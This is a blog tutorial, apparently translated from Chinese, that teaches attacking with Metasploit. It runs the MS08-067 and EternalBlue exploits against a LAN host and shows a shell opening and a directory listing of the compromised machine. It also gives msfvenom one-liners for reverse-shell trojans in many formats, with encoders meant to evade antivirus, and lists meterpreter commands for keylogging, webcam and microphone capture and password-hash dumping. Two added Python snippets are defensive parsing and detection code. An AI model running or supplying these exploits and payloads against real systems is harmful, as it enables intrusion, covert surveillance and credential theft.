How to use Metasploit to attack

Copyright notice: this is the blogger's original article; reproduction without the blogger's permission is prohibited. https://blog.csdn.net/qq_20307987/article/details/80343072

I'm sorry for my English, 0^0

(1) On Kali 2, open a shell and run msfconsole.
Here I will explain some of the msfconsole commands.

[+++++] banner
You will see the Metasploit banner; the useful information in it is:

       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[+++++] back
Leaves the current module and returns to the top-level prompt:

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > back
msf > 

[+++++] check
Once a module is loaded, check tests whether the target host is vulnerable without actually running the exploit:

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.1.55
RHOST => 192.168.1.55
msf exploit(ms08_067_netapi) > check
[*] 192.168.1.55:445 The target is not exploitable.
msf exploit(ms08_067_netapi) > 

[+++++] connect
Tests a port on the target host from inside the console:

msf > connect 192.168.1.55 8000
[*] Connected to 192.168.1.55:8000

A tip: connect can also use a specific source address and source port; I remember this from a CTF challenge.

[+++++] info
Shows the module's details:

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm
  Brett Moore
  frank2
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese - Brazilian (NX)
  68  Windows 2003 SP2 Spanish (NO NX)
  69  Windows 2003 SP2 Spanish (NX)
  70  Windows 2003 SP2 Japanese (NO NX)
  71  Windows 2003 SP2 French (NO NX)
  72  Windows 2003 SP2 French (NX)

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.55     yes       The target address
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:
  https://cvedetails.com/cve/CVE-2008-4250/
  OSVDB (49243)
  https://technet.microsoft.com/en-us/library/security/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf exploit(ms08_067_netapi) > 

[+++++] search
search is very useful; its help output is:

msf exploit(ms08_067_netapi) > search -h
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client

Some examples:

search name:mysql
search platform:mysql        ---- can also filter for higher-ranked modules
search type:post             ---- Metasploit has three module types (exploit / auxiliary / post)
search author:dookie
search author:dookie name:MacOS

[+++++] sessions
Lets you manage sessions once you have compromised a target.

[+++++] set
Sets options, such as the target address, for your attack.

[+++++] use
Selects a module. Oh, it is very important and easy -^- biubiubiu

(2) Here are some examples
[++++++] ms08_067

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.55     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.55:445 - Automatically detecting the target...
[*] 192.168.1.55:445 - Fingerprint: Windows 7 -  - lang:Unknown
[*] 192.168.1.55:445 - We could not detect the language pack, defaulting to English
[-] 192.168.1.55:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > 


OK, I failed, but I believe you can succeed!
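The run above aborts with no-target because the fingerprint says Windows 7, while the target table printed by info covers only Windows 2000, XP and 2003. As an added example (not part of the original post), here is a small Python parser for that target table and the Fingerprint log line; the excerpt is constructed from the output shown earlier, and the "Service Pack N" wording in the constructed XP line is an assumption about the module's fingerprint format.

```python
import re

# Constructed excerpt of the "Available targets" block printed by `info`
# (a handful of the 73 rows shown earlier on this page).
INFO_EXCERPT = """Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  63  Windows 2003 SP2 English (NO NX)

Basic options:
"""

TARGET_ROW = re.compile(r"^\s*(\d+)\s{2,}(.+?)\s*$")


def parse_targets(info_text):
    """Return {id: name} for the rows of the 'Available targets:' block."""
    targets, in_block = {}, False
    for line in info_text.splitlines():
        if line.startswith("Available targets:"):
            in_block = True
            continue
        if in_block:
            if not line.strip():        # the block ends at the first blank line
                break
            m = TARGET_ROW.match(line)
            if m:
                targets[int(m.group(1))] = m.group(2)
    return targets


def parse_fingerprint(log_line):
    """Split a 'Fingerprint: <os> - <service pack> - lang:<lang>' log line into
    (os, sp, lang). 'Service Pack 3' is normalised to 'SP3' (assumed wording)
    so it can be compared with the target names."""
    m = re.search(r"Fingerprint:\s*(.*)$", log_line)
    if not m:
        return None
    parts = [p.strip() for p in m.group(1).split(" - ")]
    if len(parts) != 3:
        return None
    os_name, sp, lang = parts
    sp = re.sub(r"^Service Pack (\d+)$", r"SP\1", sp)
    return os_name, sp, lang.replace("lang:", "", 1)


def matching_targets(targets, os_name, sp, lang):
    """Names of the targets that mention the OS, the service pack (if any) and
    the language (if detected). Id 0 is skipped: 'Automatic Targeting' is the
    chooser itself, not an OS, and it is what reported 'no-target' above."""
    wanted = [w for w in (os_name, sp, None if lang == "Unknown" else lang) if w]
    return [name for tid, name in targets.items()
            if tid != 0 and all(w in name for w in wanted)]
```

For the Windows 7 fingerprint from the post the match list is empty, which is exactly the condition that made the module abort.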

[++++++] ms17_010

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.55
RHOST => 192.168.1.55
msf exploit(ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.55:445 - Connecting to target for exploitation.
[+] 192.168.1.55:445 - Connection established for exploitation.
[+] 192.168.1.55:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.55:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.55:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.55:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600     
[+] 192.168.1.55:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.55:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.55:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.55:445 - Starting non-paged pool grooming
[+] 192.168.1.55:445 - Sending SMBv2 buffers
[+] 192.168.1.55:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.55:445 - Sending final SMBv2 buffers.
[*] 192.168.1.55:445 - Sending last fragment of exploit packet!
[*] 192.168.1.55:445 - Receiving response from exploit packet
[+] 192.168.1.55:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.55:445 - Sending egg to corrupted connection.
[*] 192.168.1.55:445 - Triggering free of corrupted buffer.
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.55:445 - Connecting to target for exploitation.
[+] 192.168.1.55:445 - Connection established for exploitation.
[+] 192.168.1.55:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.55:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.55:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.55:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600     
[+] 192.168.1.55:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.55:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.55:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.55:445 - Starting non-paged pool grooming
[+] 192.168.1.55:445 - Sending SMBv2 buffers
[+] 192.168.1.55:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.55:445 - Sending final SMBv2 buffers.
[*] 192.168.1.55:445 - Sending last fragment of exploit packet!
[*] 192.168.1.55:445 - Receiving response from exploit packet
[+] 192.168.1.55:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.55:445 - Sending egg to corrupted connection.
[*] 192.168.1.55:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.55:56666) at 2018-05-16 08:37:39 -0400
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>dir c:\
dir c:\
 Volume in drive C has no label.
 Volume Serial Number is 32F5-8E54

 Directory of c:\

04/23/2018  04:01 AM    <DIR>          3e8ad8e80165f13632b90d21195c66
07/13/2009  11:20 PM    <DIR>          PerfLogs
04/22/2018  10:48 PM    <DIR>          phpStudy
05/10/2018  02:43 AM    <DIR>          Program Files
05/14/2018  04:40 AM    <DIR>          Program Files (x86)
05/14/2018  11:24 PM    <DIR>          Python26
03/27/2018  08:33 AM    <DIR>          python27-x64
03/23/2018  04:52 AM    <DIR>          Users
05/16/2018  08:20 AM    <DIR>          Windows
05/15/2018  02:47 AM    <DIR>          ????
               0 File(s)              0 bytes
              10 Dir(s)  43,760,390,144 bytes free

OK, I succeeded, and I believe you can do better!
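The successful run ends with the target (192.168.1.55) opening a TCP connection back to the handler at 192.168.1.101:4444 a few seconds after the SMB traffic to port 445. As an added detection example (not from the original post), this Python script correlates that shape in a connection log: inbound SMB from a peer, then a new outbound connection from the same host back to that peer. The log format and every address other than the two from the post are constructed.

```python
from datetime import datetime, timedelta

# Constructed connection log (one key=value record per line), modelled on the
# session above: 192.168.1.101 talks to SMB on 192.168.1.55:445 and, seconds
# later, 192.168.1.55 connects back to the handler on 192.168.1.101:4444.
# The first two lines are benign traffic (a file-share client, a web request).
SAMPLE_LOG = """\
2018-05-16T08:30:02 src=192.168.1.20 sport=50110 dst=192.168.1.55 dport=445 proto=tcp
2018-05-16T08:30:07 src=192.168.1.55 sport=50111 dst=192.168.1.200 dport=443 proto=tcp
2018-05-16T08:37:21 src=192.168.1.101 sport=44012 dst=192.168.1.55 dport=445 proto=tcp
2018-05-16T08:37:33 src=192.168.1.101 sport=44020 dst=192.168.1.55 dport=445 proto=tcp
2018-05-16T08:37:39 src=192.168.1.55 sport=56666 dst=192.168.1.101 dport=4444 proto=tcp
"""


def parse_log(text):
    """Parse 'timestamp key=value ...' lines into dicts with typed fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *pairs = line.split()
        f = dict(p.split("=", 1) for p in pairs)
        events.append({"ts": datetime.fromisoformat(ts),
                       "src": f["src"], "sport": int(f["sport"]),
                       "dst": f["dst"], "dport": int(f["dport"])})
    return events


def find_smb_callbacks(events, window_seconds=120):
    """Alert when peer P connects to host H on 445 and, within the window, H
    opens a new connection back to P. The rule keys on the reversal of
    direction, not on port 4444: the handler port is whatever LPORT was set to.
    Returns a list of (victim, peer, callback_port, iso_timestamp)."""
    last_smb = {}          # (victim, peer) -> time of the latest inbound SMB
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["dport"] == 445:
            last_smb[(ev["dst"], ev["src"])] = ev["ts"]
            continue
        seen = last_smb.get((ev["src"], ev["dst"]))
        if seen and ev["ts"] - seen <= timedelta(seconds=window_seconds):
            alerts.append((ev["src"], ev["dst"], ev["dport"], ev["ts"].isoformat()))
    return alerts


if __name__ == "__main__":
    for victim, peer, port, when in find_smb_callbacks(parse_log(SAMPLE_LOG)):
        print(f"{when} {victim} called back to {peer}:{port} shortly after inbound SMB")
```

In practice the same rule would be fed from firewall or Zeek conn logs; the benign file-share client in the sample produces no alert because 192.168.1.55 never connects back to it.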

(3) msfvenom
Source:

 http://cache.baiducontent.com/c?m=9f65cb4a8c8507ed19fa950d100b96314c0bd73f7a83835221928448e435061e5a24feb827211206d1c77e6403a94e57e0f73766725e60e19497df0c8efad07672d36123706dd90005d269accc5124b137902cfeae69e5bbf6&p=9379c64ad4911fff57ed977a4c4382&newp=8f769a47838801eb08e2947d090581231610db2151d1d401298ffe0cc4241a1a1a3aecbf2025110ed9ce766d00a94d5fedf333723d0034f1f689df08d2ecce7e7ac36770&user=baidu&fm=sc&query=metasploit+ms15%2D034&qid=b3674fc600004194&p1=2
Purpose: generates trojan (payload) files; it replaces the older msfpayload and msfencode tools.
Options

The msfvenom command-line options are as follows:

-p, --payload <payload>      The payload to use
-l, --list [module_type]     List all available modules of the given type: payloads, encoders, nops, all
-n, --nopsled <length>       Prepend a NOP sled of the given length to the payload
-f, --format <format>        Output format (use --help-formats to list the formats msf supports)
-e, --encoder [encoder]      The encoder to use
-a, --arch <architecture>    The target architecture of the payload
    --platform <platform>    The target platform of the payload
-s, --space <length>         Maximum size of the resulting payload
-b, --bad-chars <list>       Characters to avoid, e.g. '\x00\xff'
-i, --iterations <count>     Number of times to encode the payload
-c, --add-code <path>        An additional win32 shellcode file to include
-x, --template <path>        A custom executable to use as a template
-k, --keep                   Preserve the template program's behaviour and run the injected payload as a new process
    --payload-options        List the payload's standard options
-o, --out <path>             Save the payload to a file
-v, --var-name <name>        A custom variable name to use for certain output formats
    --smallest               Generate the smallest possible payload
-h, --help                   Show help
    --help-formats           List the output formats msf supports

Option usage

List the supported payloads:

msfvenom -l payloads

List the supported output file types:

msfvenom --help-formats

List the supported encoders (used for AV evasion):

msfvenom -l encoders

List the supported NOP modules (used for AV evasion):

msfvenom -l nops

Basic payloads

Command format

msfvenom -p <payload> <payload options> -f <format> -o <path>

Linux
Reverse connection:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Bind connection:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa

Scripting Payloads

Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers

Encoding the payload

Command format:
msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

Common encoders:
x86/shikata_ga_nai
cmd/powershell_base64

Example:
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 -f exe > 1.exe

Custom template

Example of generating a payload that runs the calculator (calc.exe as the template):
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

(4) How to choose a payload

Linux payloads:
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

Windows payloads:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

Connecting to the trojan

Start msf and use the exploit/multi/handler module.

use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
set RHOST 10.0.0.1
set LPORT 12345
exploit

Note: the payload set here must match the payload used to generate the trojan; the remaining options depend on the chosen payload.

(5) When you get a meterpreter shell……

meterpreter shell

Once we have a meterpreter shell on the target server, there are many operations we can perform.

background     put the session into the background
sessions -i 1  bring the session back to the foreground
run vnc        start the remote desktop


**File management:**

download  download a file
edit      edit a file
cat       view a file
mkdir     create a directory
mv        move
rm        delete
upload    upload a file
rmdir     delete a directory

**Network and system operations:**

arp       view the ARP cache
ifconfig  IP addresses and network interfaces
getproxy  get the proxy settings
netstat   view port connections
kill      kill a process
ps        list processes
reboot    reboot the machine
reg       modify the registry
shell     get a shell
shutdown  shut down the machine
sysinfo   get system information

**User operations and other functions:**

enumdesktops   number of logged-in users
keyscan_dump   keylogger - dump
keyscan_start  keylogger - start
keyscan_stop   keylogger - stop
uictl          take control of the keyboard and mouse
record_mic     record audio
webcam_chat    view the webcam interface
webcam_list    list webcams
webcam_stream  stream webcam video
getsystem      escalate privileges
hashdump       dump the hashes
